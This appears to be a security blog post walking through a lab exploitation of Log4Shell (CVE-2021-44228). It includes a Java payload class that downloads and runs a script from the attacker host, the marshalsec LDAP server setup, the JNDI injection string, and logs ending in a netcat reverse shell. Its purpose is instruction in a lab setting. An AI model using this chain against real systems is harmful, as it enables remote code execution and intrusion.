Post

Lab – Exploiting Log4Shell (CVE-2021-44228)

Background

On December 10th, 2021 the Log4Shell vulnerability, a “0-day” exploit in log4j2 appeared on Twitter. In this post, we will explore how to exploit it with LDAP in a lab environment. In order to be exploitable, you need any logged user input, log4j2 versions 2.0 to 2.14.1, and settings com.sun.jndi.rmi.object.trustURLCodebase & com.sun.jndi.cosnaming.object.trustURLCodebase set to true (which is not default for Java runtimes >= 8u121).

To my understanding, any Java version will allow the DNS lookup (given the points noted above are true) but not necessarily the RCE via LDAP. In this example, we will exploit it against Java 8u211.

You can find additional information here:

Exploitation

  • Attacker: 10.8.0.2
  • Victim: 10.10.10.7

Create the payload java class:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
public class RCE {
    static {
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec("wget http://10.8.0.2/x -O /tmp/x");
            p.waitFor();
            r = Runtime.getRuntime();
            p = r.exec("/bin/bash /tmp/x");
            p.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
    public RCE(){
        System.out.println("Is this RCE?");
    }
}

Compile the class with the same java version the target uses (this can be guessy, but if debug is enabled it will complain about mismatching versions):

1
javac RCE.java

Download, compile & start the server:

1
2
3
4
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.8.0.2:8888/#RCE"

Start a webserver that hosts the final payload & one that hosts the class file:

1
2
python3 -m http.server 80
python3 -m http.server 8888

Finally, send the payload to the target:

1
${jndi:ldap://10.8.0.2:1389/a}

When everything went well, you will get a download of “x” on your webserver which will be executed with bash.

1
2
3
4
5
6
7
8
9
10
11
12
Send LDAP reference result for a redirecting to http://10.8.0.2:8888/RCE.class
...
10.10.10.7 - - [11/Dec/2021 16:49:33] "GET /RCE.class HTTP/1.1" 200 -
...
10.10.10.7 - - [11/Dec/2021 16:49:33] "GET /x HTTP/1.1" 200 -
...
nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.8.0.2] from (UNKNOWN) [10.10.10.7] 38670
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)

Alternatively, you can also use this JNDI Server which supports LDAP & RMI:

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C <command> -A <address> 

If you want to practice in this lab environment, vulnlab is currently open for beta access to patreon subscribers!

This post is licensed under CC BY 4.0 by the author.